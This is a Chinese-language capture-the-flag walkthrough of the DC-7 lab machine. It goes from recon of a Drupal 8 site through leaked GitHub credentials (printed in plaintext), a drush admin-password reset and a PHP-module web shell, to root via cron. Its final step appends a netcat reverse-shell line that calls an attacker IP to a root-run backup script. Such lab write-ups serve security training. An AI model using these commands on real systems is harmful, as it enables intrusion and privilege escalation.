1.信息搜集
端口 22,80
存活主机 192.168.85.134
2.访问网站进行信息搜集

发现提示信息，大体意思，有一个新概念，爆破可能失败，跳出框思考
cms：drupal 8.0
msf尝试利用失败
3.对网站进行渗透测试
尝试弱口令 失败 试出用户admin
sql注入失败
这里考的是源码泄露，没想到
github搜索@dc7user，发现源码，查看配置文件，发现密码和用户

4.ssh登录
刚开始尝试进行网站登录失败，进行mysql数据库失败，估计没开外联
进行ssh登录成功
username dc7user
password MdR3xOgB7#dW
进入家目录，发现一个备份文件，还有一个mbox，查看mbox发现有一个以root执行的脚本

查看/opt/scripts/backups.sh,并查看权限，发现www-data组和root是有权限执行和修改的


不知道如何做，先放放

5.尝试提权
suid提权的exim4失败

内核没找到可利用的漏洞
再说上面的那个备份脚本，有一个思路，可以，用www-data用户修改文件反弹一个shell，是root执行的计划任务，可以反弹回来一个root权限的shell，现在考虑怎么切换用户到www-data，直接在网站根目录中写目录是不行的，没权限
6.登录网站反弹shell
通过前面知道了用户有一个admin，如何知道这个用户的密码，本地直接登录mysql数据库失败，使用数据库修改密码就不行了，在那个backups.sh中有一个命令drush，这个命令是可以进行修改用户账号密码的

注意需要在/var/www/html网站根目录下执行

drush -user-password admin --password=’123456‘

6.登录网站反弹shell
登录成功
修改源码，新建文件，上传文件
上传主题失败了
直接编辑文件，发现只能是html代码
安装一个php插件
在extend—install new module—https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz（输入网址）—安装完点及enabled激活插件
在修改源码，改为php code

反弹成功

7.修改备份脚本，等待计划任务执行

echo 'nc 192.168.85.132 4455 -e /bin/bash'>>/opt/scripts/backups.sh

kali nc监听 ，等待执行即可，注意不要取执行这个脚本，因为权限会是www-data
反弹成功查看flag

dc-7